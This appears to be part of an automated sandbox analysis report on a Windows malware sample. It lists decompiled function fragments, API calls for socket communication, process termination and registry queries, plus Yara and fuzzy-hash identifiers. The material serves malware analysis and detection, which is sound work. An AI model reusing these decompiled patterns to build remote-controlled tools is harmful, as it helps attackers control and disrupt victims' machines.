                                        0x00413bd4
                                        0x00413bd8
                                        0x00413be2
                                        0x00413be3
                                        0x00413be4
                                        0x00413be5
                                        0x00413bea
                                        0x00413bf1
                                        0x00413bf2
                                        0x00413bfb
                                        0x00413bfe
                                        0x00413c05
                                        0x00413c08
                                        0x00413c0b
                                        0x00413c17
                                        0x00413c39
                                        0x00000000
                                        0x00413c39
                                        0x00413c29
                                        0x00413c31
                                        0x00413c33
                                        0x00000000
                                        0x00413c33
                                        0x00413c3e

                                        APIs
                                        • RegisterClassExA.USER32(00000030), ref: 00413C0E
                                        • CreateWindowExA.USER32 ref: 00413C29
                                        • GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: ClassCreateErrorLastRegisterWindow
                                        • String ID: 0$MsgWindowClass
                                        • API String ID: 2877667751-2410386613
                                        • Opcode ID: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                        • Instruction ID: 7311bfe71f6f07f925a5bea5fd399074fa81e1952be4f1bddfc29815928cdf0b
                                        • Opcode Fuzzy Hash: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                        • Instruction Fuzzy Hash: D5019A72C00228AACB21CF91EC08ADFBFB9EF45761B004026F410B6240D7B05606CAE4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004032B3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                          • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                          • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                          • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032DA
                                        • atoi.MSVCRT ref: 004032E1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032ED
                                        Strings
                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004032C1
                                        • CurrentBuildNumber, xrefs: 004032BC
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@CloseD@1@@OpenQueryValueatoi
                                        • String ID: CurrentBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                        • API String ID: 1453687294-3377751560
                                        • Opcode ID: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                        • Instruction ID: fd2564c0d0cdcb3147c4efd585e8939db476c869aa5c4bae27b80d41888a3fe0
                                        • Opcode Fuzzy Hash: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                        • Instruction Fuzzy Hash: FFE04F72A00618E7C700B7A8DC0AFEEB768EB44755F504479B922A21D2EA749518C69C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004126EF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 18threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004126EF(char _a4) {
				void* _t2;
				void* _t3;

				_t1 =  &_a4; // 0x40e322
				_t2 = GetCurrentProcess();
				_t3 = GetCurrentThread();
				return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2);
			}





                                        0x004126ff
                                        0x00412702
                                        0x00412705
                                        0x00412717

                                        APIs
                                        • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                        • GetCurrentThread.KERNEL32 ref: 00412705
                                        • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                        • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Current$Process$DuplicateHandleThread
                                        • String ID: "@
                                        • API String ID: 3566409357-445313631
                                        • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                        • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                        • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                        • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040ACE6, Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,?), ref: 0040AD26
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?), ref: 0040AD30
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000068,?,?,?,?,?,?), ref: 0040AD44
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                          • Part of subcall function 00402149: malloc.MSVCRT ref: 00402175
                                          • Part of subcall function 00402149: recv.WS2_32(0041BE70,00000000,00000000,00000000), ref: 00402186
                                          • Part of subcall function 00402149: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                          • Part of subcall function 00402149: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                          • Part of subcall function 00402149: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                          • Part of subcall function 00402149: free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                          • Part of subcall function 00402149: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0040AD6F,00000000,?,?,?,?,?,?), ref: 0040AD5B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040AD64
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@V01@@$D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$??4?$basic_string@Y?$basic_string@connectfreemallocrecvsocket
                                        • String ID:
                                        • API String ID: 901373779-0
                                        • Opcode ID: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                        • Instruction ID: 7b2f1eb0bf348bc8e64f130e1c0075fbfd626f93203aeb1fcbfc33f5f8d0b54a
                                        • Opcode Fuzzy Hash: 75a8ada7a2264859a935fef6c13577ead575347683c46a83c76c2faa44955178
                                        • Instruction Fuzzy Hash: 4C01F272A0020867C700BF6AEC4B9EF7B2DDF94755F00043ABD02AB1C2EBB5595C82D9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040DB3C, Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040DB4D
                                          • Part of subcall function 00402038: socket.WS2_32(00000000,00000001,00000006), ref: 00402053
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB87
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB9B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@??1?$basic_string@$??4?$basic_string@V01@connectsocket
                                        • String ID:
                                        • API String ID: 1130490860-0
                                        • Opcode ID: 212030e5da73120c08e5f8d6a23c534ab92ffc11de8ac39be5ac21697676d5d1
                                        • Instruction ID: e4a4367fee434e29a8f43c0c5b5fd0ad89fe5f7d667a2954b88e43abb6528f81
                                        • Opcode Fuzzy Hash: 212030e5da73120c08e5f8d6a23c534ab92ffc11de8ac39be5ac21697676d5d1
                                        • Instruction Fuzzy Hash: E301CC3260020C8BC300BBF5AC5A5EF3722DB85354B5084BBEA126B1D1CBBC0888869E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405C62, Relevance: 7.5, APIs: 5, Instructions: 42synchronizationCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E00405C62(void* __ecx) {
				long _t7;
				void* _t10;
				void* _t18;
				void* _t19;

				_t18 = __ecx;
				_t7 = CreateEventA(0, 0, 0, 0);
				 *(_t18 + 0x34) = _t7;
				if( *((char*)(_t18 + 0x3d)) != 0) {
					_t10 = _t18 + 0x14;
					do {
						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664);
						if(_t7 != 0) {
							_t19 = _t19 - 0x10;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
							E004020C2(0x41be70, 0x5a, _t10);
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
						}
						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff);
					} while ( *((char*)(_t18 + 0x3d)) != 0);
				}
				return 1;
			}







                                        0x00405c6a
                                        0x00405c6d
                                        0x00405c77
                                        0x00405c7a
                                        0x00405c7c
                                        0x00405c84
                                        0x00405c86
                                        0x00405c90
                                        0x00405c92
                                        0x00405c98
                                        0x00405ca5
                                        0x00405cad
                                        0x00405cad
                                        0x00405cb8
                                        0x00405cbe
                                        0x00405c84
                                        0x00405cc9

                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                        • String ID:
                                        • API String ID: 2456067102-0
                                        • Opcode ID: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                        • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                        • Opcode Fuzzy Hash: 15b4c2abc69e7f07a14bf9296a48532b590bd88ea4b7715fbce87f908c72e8fb
                                        • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412981, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                        • String ID:
                                        • API String ID: 1435062097-0
                                        • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                        • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
                                        • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                        • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412B4A, Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00409B39,69D8CB60), ref: 00412B5E
                                        • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00412B7E
                                        • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                        • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleV?$allocator@$??0?$basic_string@FileG@1@@G@2@@std@@G@std@@ModuleNameOpenProcessU?$char_traits@
                                        • String ID:
                                        • API String ID: 788797586-0
                                        • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                        • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                        • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                        • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004050FC, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405117
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405124
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00405131
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040513E
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$??0?$basic_string@U?$char_traits@$D@1@@D@2@@std@@D@std@@$G@1@@G@2@@std@@G@std@@
                                        • String ID:
                                        • API String ID: 1622488342-0
                                        • Opcode ID: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                        • Instruction ID: 6e933e02768027194ec3cb2a5611c35ee588213e6c767ddfd1f1ad46262d6be2
                                        • Opcode Fuzzy Hash: c1a5856092b36e96a87c4607521c20b7092bbb6a4e7882b0079fe39a6a9934d7
                                        • Instruction Fuzzy Hash: 37F01D71504A5EDFCB14CFE4D9489DABBFCAA58249300486D9593C3500E670F20DCB20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402526, Relevance: 7.5, APIs: 5, Instructions: 34networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WS2_32(00000000,00000001,00000006), ref: 00402530
                                        • connect.WS2_32(00000000,0041B320,00000010), ref: 0040253F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041B310,?,004040BC,00000056,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 00402552
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                          • Part of subcall function 00402440: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                          • Part of subcall function 00402440: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                          • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                          • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                          • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                          • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        • closesocket.WS2_32(00000000), ref: 0040256A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000,00000000,0041B320,00000010,00000000,00000001,00000006,0041B310,?,004040BC,00000056), ref: 00402575
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??1?$basic_string@$??0?$basic_string@?length@?$basic_string@A?$basic_string@V01@@$?data@?$basic_string@?empty@?$basic_string@D@1@@V01@Y?$basic_string@closesocketconnectsendsocket
                                        • String ID:
                                        • API String ID: 3330461409-0
                                        • Opcode ID: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                        • Instruction ID: d3ca73ae3b273f0ad2b6a7631a0cd8f88755cf7fea3d905b6ba3b72b83ddc57b
                                        • Opcode Fuzzy Hash: bb6c5c5d8a8d8357e46d65d827089c0458299dd1d4395e672c94243f6853844e
                                        • Instruction Fuzzy Hash: F4F08231A4021876DB107AA6DC0EFDE7A088F517B4F004126FD25A61D2D6B94A9086DD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D817, Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E0040D817(void* __eflags) {
				char* _t8;
				void* _t25;

				_t8 = E0040180C(_t25 - 0x10, __eflags, 0);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				GetWindowThreadProcessId(atoi(_t8), _t25 - 0x2c);
				E004126BC( *(_t25 - 0x2c));
				E0040EBBE();
				E004017DD(_t25 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}





                                        0x0040d820
                                        0x0040d827
                                        0x0040d836
                                        0x0040d83f
                                        0x0040e51b
                                        0x0040e6a4
                                        0x0040e6ac
                                        0x0040e6b5
                                        0x0040e6c1

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?), ref: 0040D827
                                        • atoi.MSVCRT ref: 0040D82E
                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0040D836
                                          • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                          • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                          • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                          • Part of subcall function 0040EBBE: EnumWindows.USER32(0040EA96,00000000), ref: 0040EBD5
                                          • Part of subcall function 0040EBBE: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BE60), ref: 0040EBE5
                                          • Part of subcall function 0040EBBE: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,00000063), ref: 0040EC01
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Process$??1?$basic_string@$??0?$basic_string@??4?$basic_string@?c_str@?$basic_string@CloseEnumHandleOpenTerminateThreadV01@V01@@WindowWindowsatoi
                                        • String ID:
                                        • API String ID: 2919580351-0
                                        • Opcode ID: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                        • Instruction ID: 7c517d206c8b3613f115d3eb8ec4858c415f79e5c2237a3465432eab5c7cfc94
                                        • Opcode Fuzzy Hash: 286111b59651673a2ab3b6f4f68ab843ff1871be7256de3f8cac4962603d56ee
                                        • Instruction Fuzzy Hash: 88F0F872900519DFCB04ABF1EC599EDB734EB9431AB10883AE112A20E1EA785555CB2C
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412100, Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412117
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041212B
                                        • ?find_last_of@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(00416C00,69D65DF8), ref: 00412140
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 0041214F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412158
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
